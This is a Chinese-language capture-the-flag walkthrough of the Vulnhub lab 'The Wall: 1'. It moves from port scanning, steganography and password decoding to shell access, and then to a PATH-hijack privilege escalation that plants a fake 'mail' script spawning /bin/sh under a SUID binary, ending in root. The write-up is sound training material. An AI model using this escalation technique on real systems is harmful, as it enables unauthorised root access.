tick.Tack

The Wall: 1

The Wall 1 from Vulnhub


首先用nmap掃描目標ip,會發現完全沒有對外開放的por

root@kali:~/Security/wall# nmap -n -p- -T5 192.168.0.116
...
All 65535 scanned ports on 192.168.0.116 are filtered

找不到對外的開口,只好來看看目標有沒有對外發送甚麼訊息

開啟wireshark後針對目標ip設定filter

發現每10秒左右會收到該目標要求跟攻擊端電腦的port 1337連線

就來監聽一下port 1337,看看對方送甚麼內容

root@kali:~/Security/wall# nc -lp 1337

                       .u!"`
                   .x*"`
               ..+"NP
            .z""   ?
          M#`      9     ,     ,
                   9 M  d! ,8P'
                   R X.:x' R'  ,
                   F F' M  R.d'
                   d P  @  E`  ,
      ss           P  '  P  N.d'
       x         ''        '
       X               x             .
       9     .f       !         .    $b
       4;    $k      /         dH    $f
       'X   ;$$     z  .       MR   :$
        R   M$$,   :  d9b      M'   tM
        M:  #'$L  ;' M `8      X    MR
        `$;t' $F  # X ,oR      t    Q;
         $$@  R$ H :RP' $b     X    @'
         9$E  @Bd' $'   ?X     ;    W
         `M'  `$M d$    `E    ;.o* :R   ..
          `    '  "'     '    @'   '$o*"'

              The Wall by @xerubus
          -= Welcome to the Machine =-


If you should go skating on the thin ice of modern life, dragging behind you the 
silent reproach of a million tear-stained eyes, don't be surprised when a crack 
in the ice appears under your feet. - Pink Floyd, The Thin Ice

收到一條歡迎訊息,看起來只是Pink Floyd的歌詞…

在不知道該做甚麼的情況下只好再掃一次nmap,看看接收訊息後有沒有觸發甚麼開關

root@kali:~/Security/wall# nmap -n -sT 192.168.0.116 -p-

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-12-19 18:15 CST
Nmap scan report for 192.168.0.116
Host is up (0.0048s latency).
Not shown: 65534 filtered ports
PORT   STATE SERVICE
80/tcp open  http
1965/tcp open  unknown
MAC Address: AC:BC:32:80:89:77 (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 112.28 seconds

有兩個port被打開了!

port 80有開,先用瀏覽器看一下

首頁只是一張Pink Floyd的合照,不過檢視原始碼之後會看到一段備註跟一串數字

<!--If you want to find out what's behind these cold eyes, you'll just have to claw your way through this disguise. - Pink Floyd, The Wall

Did you know? The Publius Enigma is a mystery surrounding the Division Bell album.  Publius promised an unspecified reward for solving the
riddle, and further claimed that there was an enigma hidden within the artwork.

737465673d3333313135373330646262623337306663626539373230666536333265633035-->

備註看起來是有密碼藏在圖片裡的意思

拿kali, stegano, password去google之後,會找到一個叫做steghide的工具

steghide可以將檔案藏入圖片中,並且設置密碼保護

備註的那串數字應該就是要用的密碼了

root@kali:~/Security/wall# steghide extract -sf pink_floyd.jpg
Enter passphrase:
steghide: could not extract any data with that passphrase!

結果不能直接輸入數字當密碼,只好把他轉成hex試試看

root@kali:~/Security/wall# python -c 'print "737465673d3333313135373330646262623337306663626539373230666536333265633035".decode("hex");'
steg=33115730dbbb370fcbe9720fe632ec05

轉出來的字串看起來有意義了,但是在拿後面那串16進位的字串當密碼還是失敗

最後看他符合md5的格式,就直接丟去google,馬上就得到答案:divisionbell

輸入密碼後就會解出一個txt檔,內容看起來又是要解另兩組編碼

root@kali:~/Security/wall# steghide extract -sf pink_floyd.jpg
Enter passphrase:
wrote extracted data to "pink_floyd_syd.txt".
root@kali:~/Security/wall# cat pink_floyd_syd.txt
Hey Syd,

I hear you're full of dust and guitars?

If you want to See Emily Play, just use this key: U3lkQmFycmV0dA==|f831605ae34c2399d1e5bb3a4ab245d0

Roger

Did you know? In 1965, The Pink Floyd Sound changed their name to Pink Floyd.  The name was inspired
by Pink Anderson and Floyd Council, two blues muscians on the Piedmont Blues record Syd Barret had in
his collection.

前半段用base64解碼後得到:SydBarrett

後半段再拿去google搜尋md5得到:pinkfloydrocks

解完這兩組key之後,也沒有後續的線索了

再來試一下剛剛namp掃到的port 1965,嘗試用ssh連線看看

root@kali:~/Security/wall# nc 192.168.0.116 1965
SSH-2.0-OpenSSH_7.0

拿剛剛得到的兩組字串當帳密去試試看

root@kali:~/Security/wall# ssh SydBarrett@192.168.0.116 -p 1965
The authenticity of host '[192.168.0.116]:1965 ([192.168.0.116]:1965)' can't be established.
ECDSA key fingerprint is 6c:2b:d1:2c:4f:1c:b5:7a:1b:1e:e9:4b:8e:9b:4b:5a.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '[192.168.0.116]:1965' (ECDSA) to the list of known hosts.
SydBarrett@192.168.0.116's password:
Could not chdir to home directory /home/SydBarrett: No such file or directory
This service allows sftp connections only.
Connection to 192.168.0.116 closed.

結果被系統打槍,只好照他說的用sftp登入,接著把裡面的東西通通抓回來研究

root@kali:~/Security/wall# sftp -P1965 SydBarrett@192.168.0.116
SydBarrett@192.168.0.116's password:
Connected to 192.168.0.116.
sftp> sl
Invalid command.
sftp> ls -al
drwxr-x---    3 0        1000          512 Oct 24 20:16 .
drwxr-x---    3 0        1000          512 Oct 24 20:16 ..
drwxr-xr-x    3 0        1000          512 Oct 24 18:17 .mail
-rw-r--r--    1 0        1000         1912 Oct 25 22:56 bio.txt
-rw-r--r--    1 0        1000       868967 Oct 24 16:17 syd_barrett_profile_pic.jpg
sftp> get bio.txt
Fetching /bio.txt to bio.txt
/bio.txt                                                                100% 1912     1.9KB/s   00:00
sftp> get syd_barrett_profile_pic.jpg
Fetching /syd_barrett_profile_pic.jpg to syd_barrett_profile_pic.jpg
/syd_barrett_profile_pic.jpg                                            100%  849KB 848.6KB/s   00:00
sftp> cd .mail
sftp> ls
sent-items
sftp> ls -al
drwxr-xr-x    3 0        1000          512 Oct 24 18:17 .
drwxr-x---    3 0        1000          512 Oct 24 20:16 ..
drwxr-xr-x    2 0        1000          512 Nov 11 10:25 .stash
-rw-r--r--    1 0        1000          309 Oct 24 18:18 sent-items
sftp> get sent-items
Fetching /.mail/sent-items to sent-items
/.mail/sent-items                                                       100%  309     0.3KB/s   00:00
sftp> cd .
../      ./       .stash/
sftp> cd .stash/
sftp> ls
eclipsed_by_the_moon
sftp> ls -al
drwxr-xr-x    2 0        1000          512 Nov 11 10:25 .
drwxr-xr-x    3 0        1000          512 Oct 24 18:17 ..
-rw-r--r--    1 0        1000     48884479 Aug  7 14:33 eclipsed_by_the_moon
sftp> get eclipsed_by_the_moon
Fetching /.mail/.stash/eclipsed_by_the_moon to eclipsed_by_the_moon
/.mail/.stash/eclipsed_by_the_moon                                      100%   47MB   5.8MB/s   00:00
sftp>

看來看去最可疑的是sent-items的內容和eclipsed_by_the_moon

說找到後用scalpel處理??

root@kali:~/Security/wall# cat sent-items
Date: Sun, 24 Oct 1965 18:45:21 +0200
From: Syd Barrett <syd@pink.floyd>
Reply-To: Syd Barret <syd@pink.floyd>
To: Roger Waters <roger@pink.floyd>
Subject: Had to hide the stash

Roger... I had to hide the stash.

Usual deal.. just use the scalpel when you find it.

Ok, sorry for that.

Rock on man

"Syd"

檢查eclipsed_by_the_moon之後會發現他其實是個gz檔

解壓縮後會得到一個用tar壓縮的檔案,再換tar解壓縮一次

root@kali:~/Security/wall/ec# file eclipsed_by_the_moon.lsd
eclipsed_by_the_moon.lsd: DOS/MBR boot sector, code offset 0x3c+2, OEM-ID "MSDOS5.0", sectors/cluster 2, reserved sectors 8, root entries 512, Media descriptor 0xf8, sectors/FAT 188, sectors/track 63, heads 255, hidden sectors 2048, sectors 96256 (volumes > 32 MB) , serial number 0x9e322180, unlabeled, FAT (16 bit)

最後得到一個lsd檔

研究一下scalpel的用法之後,到/etc/scalpel/scalpel.conf把想要搜尋的檔案類型打開

root@kali:~/Security/wall# scalpel eclipsed_by_the_moon.lsd
Scalpel version 1.60
Written by Golden G. Richard III, based on Foremost 0.69.

Opening target "/root/Security/wall/eclipsed_by_the_moon.lsd"

Image file pass 1/2.
eclipsed_by_the_moon.lsd: 100.0% |*****************************************************|   47.0 MB    00:00 ETAAllocating work queues...
Work queues allocation complete. Building carve lists...
Carve lists built.  Workload:
jpg with header "\xff\xd8\xff\xe0\x00\x10" and footer "\xff\xd9" --> 1 files
Carving files from image.
Image file pass 2/2.
eclipsed_by_the_moon.lsd: 100.0% |*****************************************************|   47.0 MB    00:00 ETAProcessing of image file complete. Cleaning up...
Done.
Scalpel is done, files carved = 1, elapsed = 0 seconds.

拿到了Roger Waters的密碼,再用他的帳號登入ssh看看

root@kali:~/Security/wall/roger_waters# ssh RogerWaters@192.168.0.116 -p1965
RogerWaters@192.168.0.116's password:
Permission denied, please try again.
RogerWaters@192.168.0.116's password:
Permission denied, please try again.
RogerWaters@192.168.0.116's password:
OpenBSD 5.8 (GENERIC) #1066: Sun Aug 16 02:33:00 MDT 2015

                       .u!"`
                   .x*"`
               ..+"NP
            .z""   ?
          M#`      9     ,     ,
                   9 M  d! ,8P'
                   R X.:x' R'  ,
                   F F' M  R.d'
                   d P  @  E`  ,
      ss           P  '  P  N.d'
       x         ''        '
       X               x             .
       9     .f       !         .    $b
       4;    $k      /         dH    $f
       'X   ;$$     z  .       MR   :$
        R   M$$,   :  d9b      M'   tM
        M:  #'$L  ;' M `8      X    MR
        `$;t' $F  # X ,oR      t    Q;
         $$@  R$ H :RP' $b     X    @'
         9$E  @Bd' $'   ?X     ;    W
         `M'  `$M d$    `E    ;.o* :R   ..
          `    '  "'     '    @'   '$o*"'
$ uname -a
OpenBSD thewall.localdomain 5.8 GENERIC#1066 i386
$ id
uid=1002(RogerWaters) gid=1002(RogerWaters) groups=1002(RogerWaters)

終於成功拿到shell了,接下來要找提權的方法

研究一下之後發現系統上有五個使用者,目前已經拿到兩個使用者的權限,推測大概要把五個都走完

$ cat /etc/passwd
...
SydBarrett:*:1000:1000:Syd Barrett:/home/SydBarrett:/sbin/nologin
NickMason:*:1001:1001:Nick Mason:/home/NickMason:/bin/ksh
RogerWaters:*:1002:1002:Roger Waters:/home/RogerWaters:/bin/ksh
RichardWright:*:1003:1003:Richard Wright:/home/RichardWright:/bin/ksh
DavidGilmour:*:1004:1004:David Gilmour:/home/DavidGilmour:/bin/ksh

接著找看看系統上特別設定stick bit的檔案

$ for i in $(find / -perm -4000 2>/dev/null); do ls -al $i; done
...
-rws--s--x  1 NickMason  NickMason  7291 Aug  8 00:33 /usr/local/bin/brick
-rwsr-s---  1 DavidGilmour  RichardWright  7524 Oct 25 07:58 /usr/local/bin/shineon

找到了兩個檔案,不過可以執行的只有/usr/local/bin/brick

執行之後回答問題就能拿到NickMason的權限

$ /usr/local/bin/brick
...
Who is the only band member to be featured on every Pink Floyd album? : Nick Mason
/bin/sh: Cannot determine current working directory
$ id
uid=1001(NickMason) gid=1001(NickMason) groups=1002(RogerWaters)

在NickMason的家目錄底下逛不到甚麼結果,就把nick_mason_profile_pic.jpg傳回攻擊端

本來以為是張圖片,結果定睛一看是個ogg檔

播放之後,會聽到一段夾雜著應該是摩斯密碼的旋律

可以直接用聽的方式來解,不過為了避免浪費時間,還是丟到Sonic Visualizer讓他圖型化比較保險XD

最後得到 richardwright1943farfisa

$ su RichardWright
Password:
ksh: Cannot determine current working directory
$ id
uid=1003(RichardWright) gid=1003(RichardWright) groups=1003(RichardWright)
$

接著以RichardWright的權限執行/usr/local/bin/shineon

$ /usr/local/bin/shineon
Menu

1. Calendar
2. Who
3. Check Internet
4. Check Mail
5. Exit

測試過後發現都是執行linux內建的程式

稍微用strings檢查一下/usr/local/bin/shineon

$ strings /usr/local/bin/shineon
...
Time - The Dark Side of the Moon
/usr/bin/cal
Press ENTER to continue.
Echoes - Meddle
/usr/bin/who
Is There Anybody Out There? - The Wall
/sbin/ping -c 3 www.google.com
Keep Talking- The Division Bell
mail

看來除了mail以外,其他都是用絕對路徑執行程式,推測這邊可以修改PATH來達到SUID的效果

$ echo $PATH
/home/RogerWaters/bin:/bin:/sbin:/usr/bin:/usr/sbin:/usr/X11R6/bin:/usr/local/bin:/usr/local/sbin:/usr/games:.

這邊看到/home/RogerWaters/bin已經排在$PATH的最前面了

再來就是切回RogerWaters的帳號,在bin的目錄建立一個假的mail

不過因為RogerWaters的家目錄不是公開的,還要另外開放權限才能讓其他帳號使用

$ mkdir bin
$ cd bin
$ echo '#!/usr/local/bin/python' > mail
$ echo 'import pty' >> mail
$ echo 'pty.spawn("/bin/sh")' >> mail
$ chmod +x mail

設定完就切回RichardWright,再執行一次/usr/local/bin/shineon,就拿到DavidGilmour的群組權限了

$ /usr/local/bin/shineon
Menu

1. Calendar
2. Who
3. Check Internet
4. Check Mail
5. Exit
4
Keep Talking- The Division Bell
/bin/sh: Cannot determine current working directory
$ id
uid=1003(RichardWright) euid=1004(DavidGilmour) gid=1003(RichardWright) groups=1003(RichardWright)
$

在DavidGilmour的家目錄下發現一個anotherbrick.txt,裡面提供了一串網址

$ cat anotherbrick.txt
# Come on you raver, you seer of visions, come on you painter, you piper, you prisoner, and shine. - Pink Floyd, Shine On You Crazy Diamond

New website for review:    pinkfloyd1965newblogsite50yearscelebration-temp/index.php

# You have to be trusted by the people you lie to. So that when they turn their backs on you, you'll get the chance to put the knife in. - Pink Floyd, Dogs
$

連上網頁後,在程式碼最後有一行註解

<!--Through the window in the wall, come streaming in on sunlight wings, a million bright ambassadors of morning. - Pink Floyd, Echoes
Can you see what the Dog sees? Perhaps hints of lightness streaming in on sunlight wings?-->

這隻狗下面貌似有兩排字,調整亮度跟對比後會得到

/welcometothemachine
50696e6b466c6f796435305965617273

50696e6b466c6f796435305965617273用hex解碼後會得到PinkFloyd50Years

而將/welcometothemachine輸入網址列後會得到403 Forbidden的結果

實際到/var/www目錄後,看到htdocs的群組權限是指定給welcometothemachine

$ id
uid=1003(RichardWright) euid=1004(DavidGilmour) gid=1003(RichardWright) groups=1003(RichardWright)
$ cat /etc/group
welcometothemachine:*:1005:DavidGilmour

在這邊卡了十分鐘之後,只好認命回家目錄再找找有沒有其他線索

最後在david_gilmour_profile_pic.jpg找到了一個字串

拿這當的密碼就能登入DavidGilmour的帳號了orz

$ strings david_gilmour_profile_pic.jpg
who_are_you_and_who_am_i
$ su DavidGilmour
Password:
$ id
uid=1004(DavidGilmour) gid=1004(DavidGilmour) groups=1004(DavidGilmour), 1(daemon), 67(www), 1005(welcometothemachine)

再回到剛剛的/var/www/htdocs,最後找到PinkFloyd這個執行檔

本來以為解碼過的字串是正確答案,結果原句輸入就得到了新的權限了orz

$ ./PinkFloyd
Please send your answer to Old Pink, in care of the Funny Farm. - Pink Floyd, Empty Spaces
Answer: PinkFloyd50Years

Denied....
If I had my way, I'd have all of ya shot. - Pink Floyd, In The Flesh
$ ./PinkFloyd
Please send your answer to Old Pink, in care of the Funny Farm. - Pink Floyd, Empty Spaces
Answer: 50696e6b466c6f796435305965617273

Fearlessly the idiot faced the crowd smiling. - Pink Floyd, Fearless

Congratulations... permission has been granted.
You can now set your controls to the heart of the sun!
$ id
uid=1004(DavidGilmour) gid=1004(DavidGilmour) groups=1004(DavidGilmour), 1(daemon), 67(www), 1005(welcometothemachine)

只是拿到daemon和www的權限之後有點無所適從,最後才發現其實是拿到了sudo的權限

$ sudo -l
Password:
Matching Defaults entries for DavidGilmour on thewall:
    env_keep+="FTPMODE PKG_CACHE PKG_PATH SM_PATH SSH_AUTH_SOCK"

User DavidGilmour may run the following commands on thewall:
    (ALL) SETENV: ALL
    (ALL) SETENV: ALL

$ sudo su
# id
uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest)
# cat /root/flag.txt

"The band is fantastic, that is really what I think. Oh, by the way, which one is Pink? - Pink Floyd, Have A Cigar"

                   Congratulations on rooting thewall!

   ___________________________________________________________________
  | |       |       |       |       |       |       |       |       | |
  |_|_______|_______|______ '__  ___|_______|_______|_______|_______|_|
  |     |       |       |   |  )      /         |       |       |     |
  |_____|_______|_______|__ |,' , .  | | _ , ___|_______|_______|_____|
  | |       |       |      ,|   | |\ | | ,' |       |       |       | |
  |_|_______|_______|____ ' | _ | | \| |'\ _|_______|_______|_______|_|
  |     |       |       |   \  _' '  ` |  \     |       |       |     |
  |_____|_______|_______|_  ,-'_ _____ | _______|_______|_______|_____|
  | |       |       |   ,-'|  _     |       |       |       |       | |
  |_|_______|_______|__  ,-|-' |  ,-. \ /_.--. _____|_______|_______|_|
  |     |       |          |   |  | |  V  |   ) |       |       |     |
  |_____|_______|_______|_ | _ |-'`-'  |  | ,' _|_______|_______|_____|
  | |       |       |      |        |  '  ;'        |       |       | |
  |_|_______|_______|______"|_____  _,- o'__|_______|_______|_______|_|
  |     |       |       |       _,-'    .       |       |       |     |
  |_____|_______|_______|_ _,--'\      _,-'_____|_______|_______|_____|
  | |       |       |     '     ||_||-' _   |       |       |       | |
  |_|_______|_______|_______|__ || ||,-'  __|_______|_______|_______|_|
  |     |       |       |       |  ||_,-'       |       |       |     |
  |_____|_______|______.|_______.__  ___|_______|_______|_______|_____|
  | |       |       |   \    |     /        |       |       |       | |
  |_|_______|_______|___ \ __|___ /,  _ |   | ______|_______|_______|_|
  |     |       |       | \      // \   |   |   |       |       |     |
  |_____|_______|_______|_ \ /\ //--'\  |   | __|_______|_______|_____|
  | |       |       |       '  V/    |  |-' |__,    |       |       | |
  |_|_______|_______|_______|_______ _______'_______|_______|_______|_|
  |     |       |       |       |       |       |       |       |     |
  |_____|_______|_______|_______|_______|_______|_______|_______|_____|
  |_________|_______|_______|_______|_______|_______|_______|_______|_|

                  Celebrating 50 years of Pink Floyd!
             Syd Barrett (RIP), Nick Mason, Roger Waters,
               Richard Wright (RIP), and David Gilmour.


** Shoutouts **
+ @vulnhub for making it all possible
+ @rastamouse @thecolonial - "the test bunnies"

-=========================================-
-  xerubus (@xerubus - www.mogozobo.com)  -
-=========================================-
#

花了6個小時終於拿到flag了TT